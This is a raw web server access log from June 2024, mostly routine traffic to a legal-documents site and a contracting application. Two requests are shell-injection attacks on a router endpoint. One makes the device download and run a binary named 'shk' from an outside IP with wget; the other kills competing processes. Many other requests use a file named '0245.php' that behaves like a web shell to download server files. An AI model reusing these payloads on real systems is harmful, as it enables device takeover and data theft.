200.118.61.36 - - [16/Jun/2024:22:20:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Fe68zBFB3fQcD+LYWHKIzjHDfus+JcQ3T7v5zZuMZWh6c1QUT+Bpgi5zDTi+VNTspHqjf3wfMYVm+IOjUf5uBH0/MYI81iuTrk8EXQIrDgtfMhuDb06AwaTjkc57rcD+RSwWU9njSQ1esLl8+q3tpvSBKLLQZbhi0XvqqbElRBcgC8jQdjxK1KFinJcKT4OPRvaJjAocsWrSMFtHhk5MENPiF8L8kcypDJ4APJhy+jlzlWkc8l8Q2yl2/4YnY3M/Ke4YsMTCXz4qbkvIHBtnGeIKI4V7Hje5sCUVwB3gm35vppVVWABoQT96CuRTGzMdeHO4sXeBPc1TS2m8+3mKKIJFnoe8j4oOxXYhc23AcTKvIVtCz9ec2HGfQJdDXoW+sOvRfU35nsIm+U9CkagaLRfpe9HrUPD/1ffJuldKLFSW+pyoWliTgueKFzqdL8Q6TyOmWj+fynTNnXCYAH5pG4pyPZrjrA2/b2jr5X6lVwC88dWEuxPe/ECZjH6WrNwacgm0jrvogzgQKDNSrJWj9x/NRB42tEZdHIcwKcTlZ6zfE/IEk8ZNFxa6Rk5kCv4Xuv09nsqeDCFJkjP5cKgw/Yvp/q+3ijS4XFtBaSCM8ODT2eoQpQJnALsLNZLN2ub3DKhBPH/5UjPELgpvnjOLswbazFkOVN/Idl6qgh4oJhVBtTGNbkKccgSXuie9rwJp0oxBir1eH8nvqN5VC4SGZ9DnYapDJqbXb542NvERQQMFzhYgfU3VTfglkupmH/teeXHJa/uoQqd/CmOeq9At1U60VV7Fva6qvcWog7So+OxLrd/+cwS/XqYSsGKwZtAhaQI8ICbgpJvUHS0ZdaNurSOSF+CQ2XgGyK8enuGlxClHpkmI80c/RgB62a4LUj5OO1jMIUPYrdH+YlOcBDPhi+CMoQfnlTDfq6dv0aDZNDc3PkapV0u6EJxY6OdVYUeYfmm7lXuwXegzTNM8a1z4DRnONvLCuHkm6M2atEShYobESMLmoJT9WOS7IVF3iiBk1TRKMJRve8gQxjcxQofA1L8/ZQ2aOOWRlsmEK/y7BKGg2wBu6mmCyVEMtPI1l8L5o7zqKJBdBXcVHr5HvLOvYOHdSCoR/KXMpMZF4nuDIOiKQY16weqalU2on6A3C+BBIutKbeCPemA9g5BAyNtgWkTRObXD0a43BwoxUpqV8pz93EkRF+ooloIMkVTi4OnLp2C/d/c/dwZ/4+TAFdGG03Jt8UujE9rZEOQxsuUPGNJqvoItwyiOWi2ZaXhdpiFSy8foHBDYY/rPXnRpQYsMNQVGcLxEziPAUI1B9iZIs1kcnaZPnm+OX2NDebln7ysZO2oos50yW5tBIJeMjGEbhDGzolGq2oatLROwzpHzQafD85gCGcYSD3HJG8fRq9bUKLxR94yDq+dSqetRzfDEVQOqJwtj1HNXvfxark1ndNK4VNc3SM8IrAhIXa/Kyk6CraZmcrVtFAVBdJvCsU2Vp3DKn9YBETkbLVXmIl9jzoX0vmYuhkZuXEqRGYbtqkYVk+3yD5uVXbWMd4dgoVrVTUkB+qhZVc/jJbRVsqxJGICT5xa6gRmC7d6LYh0HLAgICNAcB82hfP845L374Xq6hL9L/g/txwjRRCTZlaXEoCQckHz0CSmFlR+uSK8inKyodSIQI70DKYR6NQEYFhAFoAVFlbkBh9/mXRc+uldmHk8Or2uTnTmu2RuHuKsvj+36ri2MY8GrbUSZVQ37UOGSS4SkD1gprGNodfKQ3c4j4qwWfU5pODKuO&u=U2FsdGVkX1+z9rl9clizjH6WkJ7YBC+vRgSMicwOavw+xLKGrwbPf/3SP/CXkiHK&y=U2FsdGVkX1/bTYo1ktL+2RrZeEL+bKYQdH9xllxjWGEcm25H4RSMcVJBXGt+I56f HTTP/1.1" 200 1319
200.118.61.36 - - [16/Jun/2024:22:20:22 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18lvApIcQe29Xu558Tr8d9r6drFaHnGE5ZoqrqAmwb3KZDLRm+QP5al64V7qw2s2NBGJnNu9zAcMOz5UhCKoOwKf/ZtHuqcyvpM1CDAZRM1Uxki8Zz119dWJqDy9u78ha8/8xsreimanflXROXcIme6xleYh7fbkMIwzmlaYB7lArZSzAAHME0K&u=U2FsdGVkX1+z9rl9clizjH6WkJ7YBC+vRgSMicwOavw+xLKGrwbPf/3SP/CXkiHK&y=U2FsdGVkX1/bTYo1ktL+2RrZeEL+bKYQdH9xllxjWGEcm25H4RSMcVJBXGt+I56f HTTP/1.1" 200 43327
200.118.61.36 - - [16/Jun/2024:22:20:23 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+X5wx0pWxmw5hIKj2u5kdNIOvcHesMeusxh4/UOEB1aGYirZBHgWDCKFM9oZUPFm1pzCL5Kl3u7k1ESMFLWfvzrBRMSV+0u8FSbKCC/QuXt7J9pocQjZYynpe0Cj2xRKE2vDi7g4O3oZBtdDP97QPbXJIpmqzrznvBnmbFTh/hy6RH/Ay1PUzwLogQjkj507EL4Noh9LTO4X+nVQ4zzTUJDP9ADxkCFKy1Ogq+jjyKks0bppyArJF7dKV9xYsCY9RUoIGtBkTEaWRzptwO4iu4oVodLrCFJnC02qwiBUbZpXHOMSMrU/emCgPwNLOAbeYWImeAMRakAK969Jcd5mBTkQi2DZV9I48YLLB5ZB1iS8T+Bi8Dah5iqeOFZJ6wa6VCkgaj2zglCwarIg6pMQekIz/GZz6PkC+HmZW0Eo2brlUgKFPmOTCq2IGzkclRy/GcsTne7wPvZW2lAyOJ6lTpmnptMIGpHy2gm6Au2wUPQuvJi2w0tj4Z9Aj6DuAdsjM7qs7oazjlKM51vUbZKP+qR6G5Q4dXeS0g2uk7VYum1fD9Kx5lZhhTysoMUZ/HJoAdIKActvyh/fCe4mJv/Z0q3vL0XfPCVpr1Dww33B5+ynBdHcF+TZj5LzhUurEVNm1Yfi/TE9ZLRzFk392C9R4ghGGyWQEYSBpwCy0OS3FLtCDl3IkEyHC6/48/VdYtMCLP3nz3gVPK0F18G36vc+g6i9/OO4IvRu/+vJzLk/Nv0ELmeK3Ccq+UYBBs8ezhb3sMfG8rE4Zm2w==&u=U2FsdGVkX1+z9rl9clizjH6WkJ7YBC+vRgSMicwOavw+xLKGrwbPf/3SP/CXkiHK&y=U2FsdGVkX1/bTYo1ktL+2RrZeEL+bKYQdH9xllxjWGEcm25H4RSMcVJBXGt+I56f HTTP/1.1" 200 222
200.118.61.36 - - [16/Jun/2024:22:20:23 -0500] "GET /kwssiamovil/sm/cjson/pre?f=19&x=U2FsdGVkX1+TnPeoEq32qqx5dRcMeMiokEEeDEEY9TbMUmFebXDOWtiMYkqk1FleL/tYma3jM/YNEHkNS1nHoQ== HTTP/1.1" 200 66301
47.128.28.8 - - [16/Jun/2024:22:20:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0504.pdf&ft=download&white=1 HTTP/1.1" 200 1113766
201.245.192.253 - - [16/Jun/2024:22:21:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.76 - - [16/Jun/2024:22:21:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1626.pdf&ft=download&white=1 HTTP/1.1" 200 364199
47.128.29.129 - - [16/Jun/2024:22:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4417.pdf&ft=download&white=1 HTTP/1.1" 200 364199
201.245.192.253 - - [16/Jun/2024:22:22:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:22:21:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.35.209 - - [16/Jun/2024:22:22:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5591.pdf&ft=download&white=1 HTTP/1.1" 200 421543
201.245.192.253 - - [16/Jun/2024:22:23:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.23.61 - - [16/Jun/2024:22:23:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0508.pdf&ft=download&white=1 HTTP/1.1" 200 380583
172.22.2.4 - - [16/Jun/2024:22:21:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.245.221.92 - - [16/Jun/2024:22:24:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:22:24:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:22:24:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.126 - - [16/Jun/2024:22:24:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3833.pdf&ft=download&white=1 HTTP/1.1" 200 405159
47.128.54.157 - - [16/Jun/2024:22:24:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=install-helper.php&ft=download HTTP/1.1" 200 5659
66.249.66.20 - - [16/Jun/2024:22:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/5951.pdf HTTP/1.1" 200 419889
66.249.66.20 - - [16/Jun/2024:22:25:06 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-144.pdf HTTP/1.1" 200 3438987
201.245.192.253 - - [16/Jun/2024:22:25:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.62 - - [16/Jun/2024:22:25:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2088.pdf&ft=download&white=1 HTTP/1.1" 200 179879
47.128.23.247 - - [16/Jun/2024:22:26:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1786.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:22:26:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:22:26:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36441
201.245.192.253 - - [16/Jun/2024:22:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34554
47.128.23.28 - - [16/Jun/2024:22:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3542.pdf&ft=download&white=1 HTTP/1.1" 200 417447
216.244.66.195 - - [16/Jun/2024:22:27:12 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:22:27:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.179 - - [16/Jun/2024:22:27:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3926.pdf&ft=download&white=1 HTTP/1.1" 200 384679
66.249.66.19 - - [16/Jun/2024:22:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/5492.pdf HTTP/1.1" 304 -
66.249.66.20 - - [16/Jun/2024:22:28:06 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/0272.pdf HTTP/1.1" 304 -
45.148.10.174 - - [16/Jun/2024:22:28:14 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [16/Jun/2024:22:28:15 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:22:28:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.184 - - [16/Jun/2024:22:28:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=60Segundos_10.flv&ft=download HTTP/1.1" 200 4226717
172.22.2.4 - - [16/Jun/2024:22:26:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:22:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34439
216.245.221.92 - - [16/Jun/2024:22:29:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.126.179 - - [16/Jun/2024:22:29:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=revision.php&ft=download&white=1 HTTP/1.1" 200 5022
201.245.192.253 - - [16/Jun/2024:22:29:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:22:29:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:22:27:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57136
201.245.192.253 - - [16/Jun/2024:22:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34554
47.128.122.221 - - [16/Jun/2024:22:29:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000242.tif&ft=notepad&white=1 HTTP/1.1" 200 339653
181.63.25.20 - - [16/Jun/2024:22:30:04 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:04 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
181.63.25.20 - - [16/Jun/2024:22:30:06 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 63093
181.63.25.20 - - [16/Jun/2024:22:30:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.63.25.20 - - [16/Jun/2024:22:30:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
181.63.25.20 - - [16/Jun/2024:22:30:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33024
201.245.192.253 - - [16/Jun/2024:22:30:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.90 - - [16/Jun/2024:22:30:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000247.tif&ft=download&white=1 HTTP/1.1" 200 593571
172.22.2.4 - - [16/Jun/2024:22:28:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59583
172.22.2.4 - - [16/Jun/2024:22:30:31 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 150058
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:04 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
47.128.122.23 - - [16/Jun/2024:22:31:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=RESOLUCION+509+DE+2000.pdf&ft=notepad&white=1 HTTP/1.1" 200 201498
181.63.25.20 - - [16/Jun/2024:22:31:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 189982
181.63.25.20 - - [16/Jun/2024:22:31:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 406821
201.245.192.253 - - [16/Jun/2024:22:31:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.186 - - [16/Jun/2024:22:31:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4076.pdf&ft=download&white=1 HTTP/1.1" 200 478887
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 73132
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:31:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:22:32:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.53.154 - - [16/Jun/2024:22:32:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6328.pdf&ft=download&white=1 HTTP/1.1" 200 401063
47.128.23.214 - - [16/Jun/2024:22:33:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5064.pdf&ft=download&white=1 HTTP/1.1" 200 409255
201.245.192.253 - - [16/Jun/2024:22:33:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 58464
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 30479
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.63.25.20 - - [16/Jun/2024:22:33:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.112.102 - - [16/Jun/2024:22:33:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2783.pdf&ft=download&white=1 HTTP/1.1" 200 929447
181.63.25.20 - - [16/Jun/2024:22:33:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:33:55 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9693
216.245.221.92 - - [16/Jun/2024:22:34:01 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:22:32:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
201.245.192.253 - - [16/Jun/2024:22:34:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
181.63.25.20 - - [16/Jun/2024:22:34:11 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 9240
201.245.192.253 - - [16/Jun/2024:22:34:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "POST /sipse/faces/presentacion/contratacion/procesoContractual/registrarInvitacionContratista.xhtml HTTP/1.1" 200 73962
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:22:32:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "POST /sipse/faces/presentacion/contratacion/contrato/crearModificarContrato.xhtml HTTP/1.1" 200 40729
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:22:34:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.49.59 - - [16/Jun/2024:22:34:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class-wp-customize-setting.php&ft=download&white=1 HTTP/1.1" 200 16317
